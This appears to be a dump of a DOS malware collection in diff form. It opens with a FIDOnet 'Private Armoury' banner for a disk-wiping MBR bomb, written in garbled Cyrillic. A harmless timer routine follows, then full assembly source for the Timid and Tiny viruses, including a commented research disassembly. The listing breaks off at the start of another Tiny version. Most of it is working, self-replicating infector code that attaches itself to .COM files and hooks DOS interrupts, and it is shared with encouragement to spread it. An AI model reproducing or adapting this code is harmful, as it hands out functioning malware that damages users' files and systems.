end start
|
|
@ -0,0 +1,19 @@
|
|||
ÉÍËÍËÍËÍËÍËÍËÍËÍ»
|
||||
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ͹ Just another stuff from
|
||||
º Ú¿  Ú¿ ÚÄ º ͹
|
||||
º ³ ³ ³Á³ à º ͹ ÄÄÄÄ<Ä Private Armoury Ä>ÄÄÄÄ
|
||||
º Á Á Á Á ÀÄ º ͹
|
||||
ÌÍÍÍÑÍÍÍÍÍÍÑÍÍ͹ ͹ FIDOnet 2:461/29.444
|
||||
ÌÍÍ͵ BOMB ÆÍÍ͹ ͼ
|
||||
ÈÍÍÍÏÍÍÍÍÍÍÏÍÍͼ
|
||||
|
||||
>-> ˆáâ ««ïæ¨ï ¢ MBR á ¯®«®© § ¬¥®© ®à¨£¨ «ì®£® § £àã§ç¨ª
|
||||
>-> Ž¤®ªà âë© ¢§àë¢ ¯® ¤®á⨦¥¨¨ 㪠§ ®© ¯à¨ ¨áâ ««ï樨 ¤ âë
|
||||
>-> <09>®«®¥ ã¨ç⮦¥¨¥ ¢á¥å DOS-à §¤¥«®¢ 1 ¨ 2 ¦¥áâª¨å ¤¨áª å
|
||||
>-> ‘ãé¥á⢥®¥ ¯®¢à¥¦¤¥¨¥ Non-DOS à §¤¥«®¢ â ¬ ¦¥
|
||||
<-< ‘®åà ¥¨¥ ¯à¥¦¥£® MBR ¢ ä ©«¥ C:\MBR.BAK
|
||||
<-< <09>®«®áâìî ª®¬¬¥â¨à®¢ ë© ¨áå®¤ë© â¥ªáâ (asm286)
|
||||
|
||||
>-> >-> €¢â®à ᨬ ¥â á á¥¡ï ¢áïªãî ®â¢¥âá⢥®áâì § «î¡ë¥ <-< <-<
|
||||
>-> >-> ¯®¢à¥¦¤¥¨ï ¨ä®à¬ 樨, ¯à®¨§®è¥¤è¨¥ ¢ १ã«ìâ ⥠<-< <-<
|
||||
>-> >-> ¥®áâ®à®¦®£® ®¡à 饨ï á ¤ ®© ¯à®£à ¬¬®©... ;))) <-< <-<
|
|
@ -0,0 +1,141 @@
|
|||
PAGE ,132
|
||||
title \asm_sour\timer.asm HIGH ACCURACY TIMER
|
||||
subttl michael e. walraven
|
||||
.MODEL MEDIUM
|
||||
|
||||
name timer
|
||||
.cref
|
||||
.lall
|
||||
|
||||
;
|
||||
; High resolution timer, returns a 32 bit high resolution
|
||||
; value which is the amount of elapsed time since the function
|
||||
; was last called. The counts are 838.2ns each (1.19318 MHz)
|
||||
; time_int() must be called first to set the timer chip to
|
||||
; the proper mode.
|
||||
; Counter 0 is changed in time_int() and the data from this
|
||||
; counter is used in elaptime() so it must not be changed
|
||||
; between calls.
|
||||
; There should not be any interference in system timing
|
||||
; max of 55 msec error introduced by time_int() into absolute
|
||||
; system time.
|
||||
|
||||
; MEDIUM memory model/microsoft 5.00
|
||||
; FAR PROGRAM, NEAR DATA
|
||||
; cs: is code segment
|
||||
; es: and ds: are data segment
|
||||
; ss: within data segment
|
||||
; ax: for integer return
|
||||
; dx:ax: for long return
|
||||
|
||||
.DATA
|
||||
; these data items located in the DSEG and can be accessed
|
||||
; as near by C programs
|
||||
|
||||
PUBLIC SYS_HI
|
||||
PUBLIC SYS_LOW
|
||||
PUBLIC TIMER_COUNT
|
||||
|
||||
SYS_HI DW ? ;TIMER_HI VALUE FOR PREVIOUS CALL
|
||||
SYS_LOW DW ? ;TIMER_LOW VALUE FOR PREVIOUS CALL
|
||||
TIMER_COUNT DW ? ;8253 TIMER COUNT FOR PREVIOUS CALL
|
||||
|
||||
|
||||
; NO ARGUMENTS PASSED to either function
|
||||
|
||||
TIMER_MODE EQU 043H
|
||||
TIMER0 EQU 040H
|
||||
|
||||
BIOS SEGMENT AT 040H
|
||||
ORG 06CH
|
||||
TIMER_LOW DW ?
|
||||
TIMER_HI DW ?
|
||||
BIOS ENDS
|
||||
|
||||
PAGE
|
||||
.CODE
|
||||
|
||||
PUBLIC _time_int
|
||||
_time_int PROC
|
||||
|
||||
; void far time_int(void);
|
||||
;
|
||||
; SET THE TIMER MODE FOR PULSE OUTPUT, RATHER THAN SQUARE
|
||||
; MODE AS SET BY DOS
|
||||
|
||||
MOV AL,00110100B ;CTR 0, LSB THEN MSB
|
||||
;MODE 2, BINARY
|
||||
OUT TIMER_MODE,AL ;MODE REGISTER FOR 8253
|
||||
SUB AX,AX ;SET 0, RESULT IN MAX COUNT
|
||||
OUT TIMER0,AL
|
||||
OUT TIMER0,AL
|
||||
RET
|
||||
_time_int ENDP
|
||||
|
||||
|
||||
PUBLIC _elaptime
|
||||
_elaptime PROC
|
||||
|
||||
; long int far elaptime(void);
|
||||
;
|
||||
; DETERMINE ELAPSED TIME SINCE LAST CALL
|
||||
; RETURNS 32 BIT (LONG) VALUE WHICH IS
|
||||
; NEW - TIMER_HI:TIMER_LO:TIMER_COUNT MINUS
|
||||
; OLD - TIMER_HI:TIMER_LO:TIMER_COUNT
|
||||
|
||||
; ASSUMPTION MADE THAT 32 BITS WILL NOT OVERFLOW!!!!
|
||||
|
||||
PUSH ES
|
||||
MOV AX,BIOS
|
||||
MOV ES,AX
|
||||
ASSUME ES:BIOS
|
||||
|
||||
MOV AL,0 ;PREPARE TO LATCH COUNTER
|
||||
OUT TIMER_MODE,AL ;LATCH 8253
|
||||
|
||||
PUSHF ;SAVE INTERRUPT STATE
|
||||
CLI ;TURN INTERRUPT OFF WHILE READING CODE
|
||||
IN AL,TIMER0
|
||||
MOV DL,AL
|
||||
IN AL,TIMER0
|
||||
MOV DH,AL ;DX HAS NEW CHIP COUNT(count down value)
|
||||
|
||||
MOV BX,ES:TIMER_LOW ;BX HAS SYSTEM TIME LOW WORD
|
||||
MOV AX,ES:TIMER_HI ;AX HAS SYSTEM TIME HIGH WORD
|
||||
|
||||
; NOW HAVE A 48 BIT WORD AX:BX:DX FOR THE PRESENT TIME
|
||||
MOV CX,TIMER_COUNT ;SWAP AND SUBTRACT
|
||||
MOV TIMER_COUNT,DX
|
||||
SUB CX,DX
|
||||
|
||||
; CX: HAS LOW 16 BITS OF DIFFERENCE
|
||||
|
||||
MOV DX,SYS_LOW ;SWAP AND SUBTRACT
|
||||
MOV SYS_LOW,BX
|
||||
SBB BX,DX
|
||||
|
||||
; BX: HAS MID 16 BITS OF DIFFERENCE
|
||||
|
||||
MOV DX,SYS_HI ;SWAP AND SUBTRACT
|
||||
MOV SYS_HI,AX
|
||||
SBB AX,DX
|
||||
|
||||
; AX: HAS HIGH 16 BITS OF DIFFERENCE
|
||||
|
||||
; NOW HAVE A 48 BIT WORD THAT IS DIFFERENCE
|
||||
; ONLY PASS BACK 32 BITS AT PRESENT
|
||||
; AS DX:AX
|
||||
|
||||
MOV AX,CX ;LOW 16 BITS
|
||||
MOV DX,BX ;MID 16 BITS
|
||||
|
||||
|
||||
POPF
|
||||
POP ES
|
||||
RET
|
||||
_elaptime ENDP
|
||||
|
||||
|
||||
END
|
||||
|
||||
|
|
@ -0,0 +1,195 @@
|
|||
;TIMID VIRUS asm by Mark Ludwig in 1991.
|
||||
;
|
||||
;-infects .coms only in current directory unless called by dos path statement
|
||||
;-announces each file infected.
|
||||
;297bytes=eff. length
|
||||
;Copied from Mark Ludwig's "The Little Black Book of Computer Viruses"
|
||||
;Slightly modified for A86 assembly.
|
||||
;-asm makes a 64k file, run against 'bait' .com to get 297 byte virus
|
||||
;-fixed bug in code reprinted in his book.
|
||||
;all infected files will have VI at byte position 4-5.
|
||||
;Mark Ludwig claims copyright on this virus and said he will
|
||||
; sue anyone distributing his viruses around. I say have fun!.
|
||||
|
||||
|
||||
main segment byte
|
||||
assume cs:main, ds:main, ss:nothing
|
||||
|
||||
org 100h
|
||||
|
||||
host:
|
||||
jmp near ptr virus_start
|
||||
db 'VI' ;identifies virus
|
||||
mov ah, 4ch
|
||||
mov al, 0
|
||||
int 21h
|
||||
|
||||
virus:
|
||||
|
||||
comfile db '*.com',0
|
||||
|
||||
virus_start:
|
||||
call get_start
|
||||
|
||||
get_start:
|
||||
sub word ptr [vir_start], offset get_start - offset virus
|
||||
mov dx, offset dta
|
||||
mov ah, 1ah
|
||||
int 21h
|
||||
call find_file
|
||||
jnz exit_virus
|
||||
call infect
|
||||
mov dx, offset fname
|
||||
mov [handle] b,24h
|
||||
mov ah, 9
|
||||
int 21h
|
||||
exit_virus: ;bug was here in book
|
||||
mov dx, 80h
|
||||
mov ah, 1ah
|
||||
int 21h
|
||||
mov bx, [vir_start]
|
||||
mov ax, word ptr [bx+(offset start_code)-(offset virus)]
|
||||
mov word ptr [host], ax
|
||||
mov ax, word ptr [bx+(offset start_code)-(offset virus)+2]
|
||||
mov word ptr [host+2],ax
|
||||
mov al, byte ptr [bx+(offset start_code)-(offset virus)+4]
|
||||
mov byte ptr [host+4], al
|
||||
mov [vir_start], 100h
|
||||
ret
|
||||
start_code:
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
|
||||
find_file:
|
||||
mov dx, [vir_start]
|
||||
add dx, offset comfile-offset virus
|
||||
mov cx, 3fh
|
||||
mov ah, 4eh
|
||||
int 21h
|
||||
|
||||
ff_loop:
|
||||
or al,al
|
||||
jnz ff_done
|
||||
call file_ok
|
||||
jz ff_done
|
||||
mov ah, 4fh
|
||||
int 21h
|
||||
jmp ff_loop
|
||||
|
||||
ff_done:
|
||||
ret
|
||||
|
||||
file_ok:
|
||||
mov dx, offset fname
|
||||
mov ax, 3d02h
|
||||
int 21h
|
||||
jc fok_nzend
|
||||
mov bx, ax
|
||||
push bx
|
||||
mov cx, 5
|
||||
mov dx, offset start_image
|
||||
mov ah, 3fh
|
||||
int 21h
|
||||
pop bx
|
||||
mov ah, 3eh
|
||||
int 21h
|
||||
mov ax, word ptr [fsize]
|
||||
add ax, offset endvirus - offset virus
|
||||
jc fok_nzend
|
||||
cmp byte ptr [start_image], 0e9h
|
||||
jnz fok_zend
|
||||
|
||||
fok_nzend:
|
||||
mov al, 1
|
||||
or al,al
|
||||
ret
|
||||
|
||||
fok_zend:
|
||||
xor al,al
|
||||
ret
|
||||
|
||||
infect:
|
||||
mov dx, offset fname
|
||||
mov ax, 3d02h
|
||||
int 21h
|
||||
mov word ptr [handle],ax
|
||||
|
||||
xor cx,cx
|
||||
mov dx,cx
|
||||
mov bx, word ptr [handle]
|
||||
mov ax, 4202h
|
||||
int 21h
|
||||
|
||||
mov cx, offset final -offset virus
|
||||
mov dx, [vir_start]
|
||||
mov bx, word ptr [handle]
|
||||
mov ah, 40h
|
||||
int 21h
|
||||
|
||||
xor cx,cx
|
||||
mov dx, word ptr [fsize]
|
||||
add dx, offset start_code-offset virus
|
||||
mov bx, word ptr [handle]
|
||||
mov ax, 4200h
|
||||
int 21h
|
||||
|
||||
mov cx, 5
|
||||
mov bx, word ptr [handle]
|
||||
mov dx, offset start_image
|
||||
mov ah, 40h
|
||||
int 21h
|
||||
|
||||
xor cx,cx
|
||||
mov dx,cx
|
||||
mov bx, word ptr [handle]
|
||||
mov ax, 4200h
|
||||
int 21h
|
||||
|
||||
mov bx, [vir_start]
|
||||
mov byte ptr [start_image], 0e9h
|
||||
mov ax, word ptr [fsize]
|
||||
add ax, offset virus_start-offset virus-3
|
||||
mov word ptr [start_image+1], ax
|
||||
mov word ptr [start_image+3], 4956h
|
||||
|
||||
mov cx, 5
|
||||
mov dx, offset start_image
|
||||
mov bx, word ptr [handle]
|
||||
mov ah, 40h
|
||||
int 21h
|
||||
|
||||
mov bx, word ptr [handle]
|
||||
mov ah, 3eh
|
||||
int 21h
|
||||
ret
|
||||
|
||||
final:
|
||||
|
||||
;data area
|
||||
endvirus equ $ + 212
|
||||
org 0ff2ah
|
||||
|
||||
dta db 1ah dup (?)
|
||||
fsize dw 0,0
|
||||
fname db 13 dup (?)
|
||||
handle dw 0
|
||||
start_image db 0,0,0,0,0
|
||||
vstack dw 50h dup (?)
|
||||
vir_start dw (?)
|
||||
|
||||
main ends
|
||||
end host
|
||||
;end of timid.asm
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,210 @@
|
|||
;This program is a basic virus that infects just COM files. It gets the first
|
||||
;five bytes of its host and stores them elsewhere in the program and puts a
|
||||
;jump to it at the start, along with the letters "VI", which are used to
|
||||
;by the virus to identify an already infected program.
|
||||
|
||||
|
||||
MAIN SEGMENT BYTE
|
||||
ASSUME CS:MAIN,DS:MAIN,SS:NOTHING
|
||||
|
||||
ORG 100H
|
||||
|
||||
;This is a shell of a program which will release the virus into the system.
|
||||
;All it does is jump to the virus routine, which does its job and returns to
|
||||
;it, at which point it terminates to DOS.
|
||||
|
||||
HOST:
|
||||
jmp NEAR PTR VIRUS_START ;Note: MASM is too stupid to assemble this correctly
|
||||
db 'VI'
|
||||
mov ah,4CH
|
||||
mov al,0
|
||||
int 21H ;terminate normally with DOS
|
||||
|
||||
VIRUS: ;this is a label for the first byte of the virus
|
||||
|
||||
COMFILE DB '*.COM',0 ;search string for a com file
|
||||
|
||||
VIRUS_START:
|
||||
call GET_START ;get start address - this is a trick to determine the location of the start of this program
|
||||
GET_START: ;put the address of GET_START on the stack with the call,
|
||||
sub WORD PTR [VIR_START],OFFSET GET_START - OFFSET VIRUS ;which is overlayed by VIR_START. Subtract offsets to get @VIRUS
|
||||
mov dx,OFFSET DTA ;put DTA at the end of the virus for now
|
||||
mov ah,1AH ;set new DTA function
|
||||
int 21H
|
||||
call FIND_FILE ;get a com file to attack
|
||||
jnz EXIT_VIRUS ;returned nz - no file to infect, exit
|
||||
call INFECT ;have a good COM file to use - infect it
|
||||
mov dx,OFFSET FNAME ;display the name of the file just infected
|
||||
mov WORD PTR [HANDLE],24H ;make sure the string terminates, put '$' after it
|
||||
mov ah,9
|
||||
int 21H ;display it
|
||||
EXIT_VIRUS:
|
||||
mov dx,80H ;fix the DTA so that the host program doesn't
|
||||
mov ah,1AH ;get confused and write over its data with
|
||||
int 21H ;file i/o or something like that!
|
||||
mov bx,[VIR_START] ;get the start address of the virus
|
||||
mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)] ;restore the 5 original bytes
|
||||
mov WORD PTR [HOST],ax ;of the COM file to their
|
||||
mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+2] ;to the start of the file
|
||||
mov WORD PTR [HOST+2],ax
|
||||
mov al,BYTE PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+4] ;to the start of the file
|
||||
mov BYTE PTR [HOST+4],al
|
||||
mov [VIR_START],100H ;set up stack to do return to host program
|
||||
ret ;and return to host
|
||||
|
||||
START_CODE: ;move first 5 bytes from host program to here
|
||||
nop ;nop's for the original assembly code
|
||||
nop ;will work fine
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
|
||||
;--------------------------------------------------------------------------
|
||||
;Find a file which passes FILE_OK
|
||||
;
|
||||
;This routine does a simple directory search to find a COM file in the
|
||||
;current directory, to find a file for which FILE_OK returns with C reset.
|
||||
;
|
||||
FIND_FILE:
|
||||
mov dx,[VIR_START]
|
||||
; add dx,OFFSET COMFILE - OFFSET VIRUS ;this is zero here, so omit it
|
||||
mov cx,3FH ;search for any file, no matter what the attributes
|
||||
mov ah,4EH ;do DOS search first function
|
||||
int 21H
|
||||
FF_LOOP:
|
||||
or al,al ;is DOS return OK?
|
||||
jnz FF_DONE ;no - quit with Z reset
|
||||
call FILE_OK ;return ok - is this a good file to use?
|
||||
jz FF_DONE ;yes - valid file found - exit with z set
|
||||
mov ah,4FH ;not a valid file, so
|
||||
int 21H ;do find next function
|
||||
jmp FF_LOOP ;and go test next file for validity
|
||||
FF_DONE:
|
||||
ret
|
||||
|
||||
|
||||
;--------------------------------------------------------------------------
|
||||
;Function to determine whether the COM file specified in FNAME is useable.
|
||||
;if so return z, else return nz.
|
||||
;What makes a COM file useable?:
|
||||
; a) There must be space for the virus without exceeding the
|
||||
; 64 KByte file size limit.
|
||||
; b) Bytes 0, 3 and 4 of the file are not a near jump op code,
|
||||
; and 'V', 'I', respectively
|
||||
;
|
||||
FILE_OK:
|
||||
mov dx,OFFSET FNAME ;first open the file
|
||||
mov ax,3D02H ;r/w access open file, since we'll want to write to it
|
||||
int 21H
|
||||
jc FOK_NZEND ;error opening file - quit and say this file can't be used
|
||||
|
||||
mov bx,ax ;put file handle in bx
|
||||
push bx ;and save it on the stack
|
||||
mov cx,5 ;next read 5 bytes at the start of the program
|
||||
mov dx,OFFSET START_IMAGE ;and store them here
|
||||
mov ah,3FH ;DOS read function
|
||||
int 21H
|
||||
|
||||
pop bx ;restore the file handle
|
||||
mov ah,3EH
|
||||
int 21H ;and close the file
|
||||
|
||||
mov ax,WORD PTR [FSIZE] ;get the file size of the host
|
||||
add ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add the size of the virus to it
|
||||
jc FOK_NZEND ;c set if ax overflows, which will happen if size goes above 64K
|
||||
cmp BYTE PTR [START_IMAGE],0E9H ;size ok - is first byte a near jump op code?
|
||||
jnz FOK_ZEND ;not a near jump, file must be ok, exit with z set
|
||||
cmp WORD PTR [START_IMAGE+3],4956H ;ok, is 'VI' in positions 3 & 4?
|
||||
jnz FOK_ZEND ;no, file can be infected, return with Z set
|
||||
FOK_NZEND:
|
||||
mov al,1 ;we'd better not infect this file
|
||||
or al,al ;so return with z reset
|
||||
ret
|
||||
FOK_ZEND:
|
||||
xor al,al ;ok to infect, return with z set
|
||||
ret
|
||||
|
||||
;--------------------------------------------------------------------------
|
||||
;This routine moves the virus (this program) to the end of the COM file
|
||||
;Basically, it just copies everything here to there, and then goes and
|
||||
;adjusts the 5 bytes at the start of the program and the five bytes stored
|
||||
;in memory.
|
||||
;
|
||||
INFECT:
|
||||
mov dx,OFFSET FNAME ;first open the file
|
||||
mov ax,3D02H ;r/w access open file, since we'll want to write to it
|
||||
int 21H
|
||||
mov WORD PTR [HANDLE],ax ;and save the file handle here
|
||||
|
||||
xor cx,cx ;prepare to write virus on new file; positon file pointer
|
||||
mov dx,cx ;cx:dx pointer = 0
|
||||
mov bx,WORD PTR [HANDLE]
|
||||
mov ax,4202H ;locate pointer to end DOS function
|
||||
int 21H
|
||||
|
||||
mov cx,OFFSET FINAL - OFFSET VIRUS ;now write the virus; cx=number of bytes to write
|
||||
mov dx,[VIR_START] ;ds:dx = place in memory to write from
|
||||
mov bx,WORD PTR [HANDLE] ;bx = file handle
|
||||
mov ah,40H ;DOS write function
|
||||
int 21H
|
||||
|
||||
xor cx,cx ;now we have to go save the 5 bytes which came from the start of the
|
||||
mov dx,WORD PTR [FSIZE] ;so position the file pointer
|
||||
add dx,OFFSET START_CODE - OFFSET VIRUS ;to where START_CODE is in the new virus
|
||||
mov bx,WORD PTR [HANDLE]
|
||||
mov ax,4200H ;and use DOS to position the file pointer
|
||||
int 21H
|
||||
|
||||
mov cx,5 ;now go write START_CODE in the file
|
||||
mov bx,WORD PTR [HANDLE] ;get file handle
|
||||
mov dx,OFFSET START_IMAGE ;during the FILE_OK function above
|
||||
mov ah,40H
|
||||
int 21H
|
||||
|
||||
xor cx,cx ;now go back to the start of host program
|
||||
mov dx,cx ;so we can put the jump to the virus in
|
||||
mov bx,WORD PTR [HANDLE]
|
||||
mov ax,4200H ;locate file pointer function
|
||||
int 21H
|
||||
|
||||
mov bx,[VIR_START] ;calculate jump location for start of code
|
||||
mov BYTE PTR [START_IMAGE],0E9H ;first the near jump op code E9
|
||||
mov ax,WORD PTR [FSIZE] ;and then the relative address
|
||||
add ax,OFFSET VIRUS_START-OFFSET VIRUS-3 ;these go in the START_IMAGE area
|
||||
mov WORD PTR [START_IMAGE+1],ax
|
||||
mov WORD PTR [START_IMAGE+3],4956H ;and put 'VI' ID code in
|
||||
|
||||
mov cx,5 ;ok, now go write the 5 bytes we just put in START_IMAGE
|
||||
mov dx,OFFSET START_IMAGE ;ds:dx = pointer to START_IMAGE
|
||||
mov bx,WORD PTR [HANDLE] ;file handle
|
||||
mov ah,40H ;DOS write function
|
||||
int 21H
|
||||
|
||||
mov bx,WORD PTR [HANDLE] ;finally, get handle off of stack
|
||||
mov ah,3EH ;and close file
|
||||
int 21H
|
||||
|
||||
ret ;all done, the virus is transferred
|
||||
|
||||
FINAL: ;label for last byte of code to be kept in virus when it moves
|
||||
|
||||
ENDVIRUS EQU $ + 212 ;label for determining space needed by virus
|
||||
;Note: 212 = FFFF - FF2A - 1 = size of data space
|
||||
; $ gives approximate size of code required for virus
|
||||
|
||||
ORG 0FF2AH
|
||||
|
||||
DTA DB 1AH dup (?) ;this is a work area for the search function
|
||||
FSIZE DW 0,0 ;file size storage area
|
||||
FNAME DB 13 dup (?) ;area for file path
|
||||
HANDLE DW 0 ;file handle
|
||||
START_IMAGE DB 0,0,0,0,0 ;an area to store 3 bytes for reading and writing to file
|
||||
VSTACK DW 50H dup (?) ;stack for the virus program
|
||||
VIR_START DW (?) ;start address of VIRUS (overlays the stack)
|
||||
|
||||
|
||||
MAIN ENDS
|
||||
|
||||
|
||||
END HOST
|
||||
|
|
@ -0,0 +1,81 @@
|
|||
VSize = 085h
|
||||
|
||||
Code Segment
|
||||
Assume CS:Code
|
||||
Org 600h
|
||||
|
||||
Bytes db 0CDh,20h,90h,90h
|
||||
|
||||
Start: mov si, 0100h
|
||||
mov bx, offset Int21
|
||||
mov cx, 0050h
|
||||
mov di, si
|
||||
add si, [si+2]
|
||||
push di
|
||||
movsw
|
||||
movsw
|
||||
mov es, cx
|
||||
cmpsb
|
||||
je StartFile
|
||||
dec si
|
||||
dec di
|
||||
rep movsw
|
||||
mov es, cx
|
||||
xchg ax, bx
|
||||
xchg ax, cx
|
||||
Loop0: xchg ax, cx
|
||||
xchg ax, word ptr es:[di-120h]
|
||||
stosw
|
||||
jcxz Loop0
|
||||
xchg ax, bx
|
||||
StartFile:
|
||||
push ds
|
||||
pop es
|
||||
ret
|
||||
|
||||
Int21: cmp ax, 4B00h
|
||||
jne End21
|
||||
Exec: push ax bx dx ds es
|
||||
mov ax, 3D02h
|
||||
call DoInt21
|
||||
jc EndExec
|
||||
cbw ; Zero AH
|
||||
cwd ; Zero DX
|
||||
mov bx, si ; Move handle to BX
|
||||
mov ds, ax ; Set DS and ES to 60h,
|
||||
mov es, ax ; the virus data segment
|
||||
mov ah, 3Fh ; Read first 4 bytes
|
||||
int 69h
|
||||
mov al, 4Dh
|
||||
scasb ; Check for 4D5Ah or infected file mark
|
||||
je Close ; .EXE or already infected
|
||||
mov al, 2
|
||||
call LSeek ; Seek to the end, SI now contains file size
|
||||
mov cl, VSize ; Virus size in CX, prepare to write
|
||||
int 69h ; AH is 40h, i.e. Write operation
|
||||
mov ax, 0E94Dh ; Virus header in AX
|
||||
stosw ; Store it
|
||||
xchg ax, si ; Move file size in AX
|
||||
stosw ; Complete JMP instruction
|
||||
xchg ax, dx ; Zero AX
|
||||
call LSeek ; Seek to the beginning
|
||||
int 69h ; AH is 40h, write the virus header
|
||||
Close: mov ah,3Eh ; Close the file
|
||||
int 69h
|
||||
EndExec: pop es ds dx bx ax
|
||||
End21: jmp dword ptr cs:[69h * 4]
|
||||
|
||||
LSeek: mov ah, 42h ; Seek operation
|
||||
cwd ; Zero DX
|
||||
DoInt21: xor cx, cx ; External entry for Open, zero cx
|
||||
int 69h
|
||||
mov cl, 4 ; 4 bytes will be read/written
|
||||
xchg ax, si ; Store AX in SI
|
||||
mov ax, 4060h ; Prepare AH for Write
|
||||
xor di, di ; Zero DI
|
||||
ret
|
||||
|
||||
VLen = $ - offset Bytes
|
||||
|
||||
Code EndS
|
||||
End
|
|
@ -0,0 +1,162 @@
|
|||
page ,132
|
||||
name TINY134
|
||||
title The 'Tiny' virus, version TINY-134
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-134 º
|
||||
; º Disassembled by Vesselin Bontchev, September 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0CDh, 20, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Initialize some registers
|
||||
mov di,offset start ; Put the addres of program start in DI
|
||||
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
|
||||
|
||||
; The virus will be installed in memory at
|
||||
; address 0050:0100h (i.e., at segment 60h):
|
||||
|
||||
mov cx,50
|
||||
|
||||
add si,[si+2] ; Determine the start addres of the virus body
|
||||
|
||||
push di ; Now a Near RET instruction will run the prg.
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov es,cx ; Point ES:DI at 0050:0100h
|
||||
cmpsb ; Check if the virus is present in memory
|
||||
jz run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec si ; Correct SI & DI to point at the start of
|
||||
dec di ; virus code and to destination address
|
||||
rep movsw ; Move the virus there
|
||||
|
||||
mov es,cx ; ES := 0
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler.
|
||||
; By the way, now DI == 1A4h (i.e., 69h*4):
|
||||
|
||||
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
|
||||
xchg ax,cx ; preserving AX
|
||||
lp:
|
||||
xchg ax,cx ; Get a word
|
||||
xchg ax,es:[di-(69-21)*4] ; Swap the two words
|
||||
stosw ; Save the word
|
||||
jcxz lp ; Loop until done (two times)
|
||||
|
||||
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
|
||||
|
||||
run:
|
||||
push ds ; Restore ES
|
||||
pop es
|
||||
ret ; And exit (go to CS:100h)
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push dx
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
call do_int21
|
||||
jc end_exec ; Exit on error
|
||||
|
||||
cbw ; Zero AH
|
||||
cwd ; Zero DX
|
||||
mov bx,si ; Save handle in BX
|
||||
mov ds,ax ; Set DS and ES to 60h,
|
||||
mov es,ax ; the virus data segment
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes
|
||||
int 69
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
jz end_exec ; Exit if file not suitable for infection
|
||||
|
||||
mov al,2 ; Seek to the end of file
|
||||
call lseek ; SI now contains the file size
|
||||
|
||||
mov cl,v_len ; Length of virus body
|
||||
int 69 ; Append the virus to the file (AH is now 40h)
|
||||
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
inc si ; Add 1 to file size for the JMP
|
||||
xchg ax,si ; Move it in AX
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
xchg ax,dx ; Zero AX
|
||||
call lseek ; Seek to the beginning
|
||||
int 69 ; AH is 40h, write the JMP instruction
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop dx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[69*4]
|
||||
|
||||
lseek:
|
||||
mov ah,42 ; Seek operation
|
||||
cwd ; Zero DX
|
||||
do_int21:
|
||||
xor cx,cx ; External entry for Open
|
||||
int 69
|
||||
mov cl,4 ; 4 bytes will be read/written
|
||||
xchg ax,si ; Store AX in SI
|
||||
mov ax,4060 ; Prepare AH for Write
|
||||
xor di,di ; Zero DI
|
||||
ret ; Done
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,168 @@
|
|||
page ,132
|
||||
name TINY138
|
||||
title The 'Tiny' virus, version TINY-138
|
||||
.radix 16
|
||||
|
||||
